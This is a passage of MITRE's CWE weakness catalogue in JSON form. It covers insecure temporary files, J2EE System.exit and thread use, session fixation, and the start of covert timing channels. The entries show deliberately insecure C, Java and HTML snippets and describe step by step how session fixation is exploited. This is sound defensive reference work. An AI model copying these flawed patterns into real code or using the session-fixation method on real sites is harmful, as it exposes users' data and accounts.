References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"}]}},"378":{"attr":{"@_ID":"378","@_Name":"Creation of Temporary File With Insecure Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"377","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the temporary file can be read by the attacker, sensitive information may be in that file which could be revealed."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"If that file can be written to by the attacker, the file might be moved into a place to which the attacker does not have access. This will allow the attacker to gain selective resource access-control privileges."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Depending on the data stored in the temporary file, there is the potential for an attacker to gain an additional input vector which is trusted as non-malicious. It may be possible to make arbitrary changes to data structures, user information, or even process ownership."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible."},{"Phase":"Implementation","Description":"Ensure that you use proper file permissions. This can be achieved by using a safe temp file function. Temporary files should be writable and readable only by the process that owns the file."},{"Phase":"Implementation","Description":"Randomize temporary file names. This can also be achieved by using a safe temp-file function. This will ensure that temporary files will not be created in predictable places."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-139"},"Intro_Text":"In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"FILE *stream;if( (stream = tmpfile()) == NULL ) {}...// remove tmp filermtmp();","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Could not open new temporary file\\\\n\\");return (-1);","xhtml:br":["",""]}},"xhtml:i":"// write data to tmp file"}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":{"#text":"File temp = File.createTempFile(\\"pattern\\", \\".suffix\\");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write(\\"aString\\");out.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"xhtml:br":["",""]}}],"Body_Text":["However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file.","Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users.","Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually \\"/tmp\\" or \\"/var/tmp\\" and on Windows systems the default directory is usually \\"C:\\\\\\\\Windows\\\\\\\\Temp\\", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper temp file opening"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Improper Temporary File Opening","attr":{"@_Date":"2008-04-11"}}}},"379":{"attr":{"@_ID":"379","@_Name":"Creation of Temporary File in Directory with Insecure Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates a temporary file in a directory whose permissions allow unintended actors to determine the file\'s existence or otherwise access that file.","Extended_Description":"On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user\'s actions are. From this, higher levels of security could be breached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"377","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Since the file is visible and the application which is using the temp file could be known, the attacker has gained information about what the user is doing at that time."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible."},{"Phase":"Implementation","Description":"Try to store sensitive tempfiles in a directory which is not world readable -- i.e., per-user directories."},{"Phase":"Implementation","Description":"Avoid using vulnerable temp file functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-139"},"Intro_Text":"In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"FILE *stream;if( (stream = tmpfile()) == NULL ) {}...// remove tmp filermtmp();","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Could not open new temporary file\\\\n\\");return (-1);","xhtml:br":["",""]}},"xhtml:i":"// write data to tmp file"}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":{"#text":"File temp = File.createTempFile(\\"pattern\\", \\".suffix\\");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write(\\"aString\\");out.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"xhtml:br":["",""]}}],"Body_Text":["However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file.","Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users.","Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually \\"/tmp\\" or \\"/var/tmp\\" and on Windows systems the default directory is usually \\"C:\\\\\\\\Windows\\\\\\\\Temp\\", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Guessed or visible temporary file"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO15-C","Entry_Name":"Ensure that file operations are performed in a secure directory"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Temporary Files", Page 538"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Guessed or Visible Temporary File","attr":{"@_Date":"2008-04-11"}},{"#text":"Creation of Temporary File in Directory with Insecure Permissions","attr":{"@_Date":"2009-05-27"}},{"#text":"Creation of Temporary File in Directory with Incorrect Permissions","attr":{"@_Date":"2020-02-24"}}]}},"382":{"attr":{"@_ID":"382","@_Name":"J2EE Bad Practices: Use of System.exit()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A J2EE application uses System.exit(), which also shuts down its container.","Extended_Description":"It is never a good idea for a web application to attempt to shut down the application container. Access to a function that can shut down the application is an avenue for Denial of Service (DoS) attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A call to System.exit() is probably part of leftover debug code or code imported from a non-J2EE application."}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"The shutdown function should be a privileged function available only to a properly authorized administrative user"},{"Phase":"Implementation","Description":"Web applications should not call methods that cause the virtual machine to exit, such as System.exit()"},{"Phase":"Implementation","Description":"Web applications should also not throw any Throwables to the application server as this may adversely affect the container."},{"Phase":"Implementation","Description":"Non-web applications may have a main() method that contains a System.exit(), but generally should not call System.exit() from other locations in the code"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Included in the doPost() method defined below is a call to System.exit() in the event of a specific exception.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());System.exit(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: System.exit()"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR09-J","Entry_Name":"Do not allow untrusted code to terminate the JVM"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: System.exit()","attr":{"@_Date":"2008-04-11"}}}},"383":{"attr":{"@_ID":"383","@_Name":"J2EE Bad Practices: Direct Use of Threads","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Thread management in a Web application is forbidden in some circumstances and is always highly error prone.","Extended_Description":"Thread management in a web application is forbidden by the J2EE standard in some circumstances and is always highly error prone. Managing threads is difficult and is likely to interfere in unpredictable ways with the behavior of the application container. Even without interfering with the container, thread management usually leads to bugs that are hard to detect and diagnose like deadlock, race conditions, and other synchronization errors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"For EJB, use framework approaches for parallel execution, instead of using threads."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, a new Thread object is created and invoked directly from within the body of a doGet() method in a Java servlet.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...Runnable r = new Runnable() {};new Thread(r).start();","xhtml:br":["","","","","","",""],"xhtml:i":["// Perform servlet tasks.","// Create a new thread to handle background processing."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// Process and store request statistics."}}}}}}}}}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: Threads"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"J2EE Bad Practices: Threads","attr":{"@_Date":"2008-01-30"}},{"#text":"J2EE Bad Practices: Use of Threads","attr":{"@_Date":"2008-04-11"}}]}},"384":{"attr":{"@_ID":"384","@_Name":"Session Fixation","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Incomplete"},"Description":"Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.","Extended_Description":{"xhtml:p":"Such a scenario is commonly observed when:","xhtml:ol":{"xhtml:li":["A web application authenticates a user without first invalidating the existing session, thereby continuing to use the session already associated with the user.","An attacker is able to force a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session.","The application or container uses predictable session identifiers. In the generic exploit of session fixation vulnerabilities, an attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to associate, and possibly authenticate, against the server using that session identifier, giving the attacker access to the user\'s account through the active session."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"346","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"472","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"441","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Invalidate any existing session identifiers prior to authorizing a new user session."},{"Phase":"Architecture and Design","Description":"For platforms such as ASP that do not generate new values for sessionid cookies, utilize a secondary cookie. In this approach, set a secondary cookie on the user\'s browser to a random value and set a session variable to the same value. If the session variable and the cookie value ever don\'t match, invalidate the session, and force the user to log on again."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example shows a snippet of code from a J2EE web application where the application authenticates users with LoginContext.login() without first calling HttpSession.invalidate().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void auth(LoginContext lc, HttpSession session) throws LoginException {}","xhtml:div":{"#text":"...lc.login();...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["In order to exploit the code above, an attacker could first create a session (perhaps by logging into the application) from a public terminal, record the session identifier assigned by the application, and reset the browser to the login page. Next, a victim sits down at the same public terminal, notices the browser open to the login page of the site, and enters credentials to authenticate against the application. The code responsible for authenticating the victim continues to use the pre-existing session identifier, now the attacker simply uses the session identifier recorded earlier to access the victim\'s active session, providing nearly unrestricted access to the victim\'s account for the lifetime of the session. Even given a vulnerable application, the success of the specific attack described here is dependent on several factors working in the favor of the attacker: access to an unmonitored public terminal, the ability to keep the compromised session active and a victim interested in logging into the vulnerable application on the public terminal.","In most circumstances, the first two challenges are surmountable given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, so long as the site is reasonably popular. The less well known the site is, the lower the odds of an interested victim using the public terminal and the lower the chance of success for the attack vector described above. The biggest challenge an attacker faces in exploiting session fixation vulnerabilities is inducing victims to authenticate against the vulnerable application using a session identifier known to the attacker.","In the example above, the attacker did this through a direct method that is not subtle and does not scale suitably for attacks involving less well-known web sites. However, do not be lulled into complacency; attackers have many tools in their belts that help bypass the limitations of this attack vector. The most common technique employed by attackers involves taking advantage of cross-site scripting or HTTP response splitting vulnerabilities in the target site [12]. By tricking the victim into submitting a malicious request to a vulnerable application that reflects JavaScript or other code back to the victim\'s browser, an attacker can create a cookie that will cause the victim to reuse a session identifier controlled by the attacker. It is worth noting that cookies are often tied to the top level domain associated with a given URL. If multiple applications reside on the same top level domain, such as bank.example.com and recipes.example.com, a vulnerability in one application can allow an attacker to set a cookie with a fixed session identifier that will be used in all interactions with any application on the domain example.com [29]."]},{"Intro_Text":"The following example shows a snippet of code from a J2EE web application where the application authenticates users with a direct post to the <code>j_security_check</code>, which typically does not invalidate the existing session before processing the login request.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"<form method=\\"POST\\" action=\\"j_security_check\\"></form>","xhtml:div":{"#text":"<input type=\\"text\\" name=\\"j_username\\"><input type=\\"text\\" name=\\"j_password\\">","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Session Fixation"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":37,"Entry_Name":"Session Fixation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"196"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Other attack vectors include DNS poisoning and related network based attacks where an attacker causes the user to visit a malicious site by redirecting a request for a valid site. Network based attacks typically involve a physical presence on the victim\'s network or control of a compromised machine on the network, which makes them harder to exploit remotely, but their significance should not be overlooked. Less secure session management mechanisms, such as the default implementation in Apache Tomcat, allow session identifiers normally expected in a cookie to be specified on the URL as well, which enables an attacker to cause a victim to use a fixed session identifier simply by emailing a malicious URL.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description"}]}},"385":{"attr":{"@_ID":"385","@_Name":"Covert Timing Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information.","Extended_Description":{"xhtml:p":["In some instances, knowing when data is transmitted between parties can provide a malicious user with privileged information. Also, externally monitoring the timing of operations can potentially reveal sensitive data. For example, a cryptographic operation can expose its internal state if the time it takes to perform the operation varies, based on the state.","Covert channels are frequently classified as either storage or timing channels. Some examples of covert timing channels are the system\'s paging rate, the time a certain transaction requires to execute, and the time it takes to gain access to a shared bus."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"514","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and 